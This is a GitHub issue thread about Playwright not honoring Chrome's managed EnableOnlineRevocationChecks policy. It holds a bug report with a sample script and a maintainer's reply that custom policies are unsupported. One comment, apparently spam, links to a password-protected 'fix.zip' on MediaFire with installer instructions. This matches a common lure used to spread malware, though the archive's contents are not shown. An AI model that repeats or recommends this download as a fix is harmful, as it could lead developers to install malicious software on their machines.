### ISSUE TITLE
[Bug]: Chromium/Chrome Managed Policies Not Supported

### ISSUE THREAD

**Issue by sgupta38** [microsoft/playwright#32324]
### Version

1.43.0

### Steps to reproduce

Chrome browser checks revocations using CRLSets by default. However, we can opt out of this behavior by adding a [policy](https://chromeenterprise.google/policies/#EnableOnlineRevocationChecks) `EnableOnlineRevocationChecks: true` in the policy file.

The [policy file](https://www.chromium.org/administrators/linux-quick-start/) is stored in:

**For Chrome:** `/etc/opt/chrome/policies/managed/test_policy.json`
**For Chromium:** `/etc/chromium/policies/managed/test_policy.json`

This is how my `test_policy.json` looks.

```
{
     "EnableOnlineRevocationChecks": true
}

```
When I run the following script, it should ideally fail with `net::ERR_CERT_REVOKED`. However, it seems to be passing because `EnableOnlineRevocationChecks` is not being honored. I can confirm that the policy is loaded successfully with this log: 
`[0826/133459.267742:INFO:policy_logger.cc(145)] :components/policy/core/common/config_dir_policy_loader.cc(113) Found mandatory policy file: /etc/opt/chrome/policies/managed/test_policy.json`. Nevertheless, it is not being honored.

This is my sample script.

```
const { chromium } = require('playwright');

(async () => {
  const browser = await chromium.launch({
    executablePath: '/usr/bin/google-chrome', 
    headless: true
  });
  const page = await browser.newPage();
  await page.goto('https://revoked.badssl.com/');

  await browser.close();
})();
```

### Expected behavior

The policy specified in `/etc/opt/chrome/policies/managed/test_policy.json` should be honored, and the test should fail. 

### Actual behavior

Policy settings mentioned in `/etc/opt/chrome/policies/managed/test_policy.json` are not honored.

### Additional context

I also tried putting test_policy.json under the recommended policy folder. But it did not work

### Environment

```shell
System:
    OS: Linux 5.4 Oracle Linux Server 8.9
    Memory: 9.11 GB / 15.34 GB
  Binaries:
    Node: 16.20.2 - /usr/bin/node
    npm: 8.19.4 - /usr/bin/npm
  Languages:
    Bash: 4.4.20 - /usr/bin/bash
```

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yury-s** [comment]
Playwright does not support testing with custom policy settings, see [this page](https://playwright.dev/docs/browsers#enterprise-policy). You are on your own when testing with such custom settings.
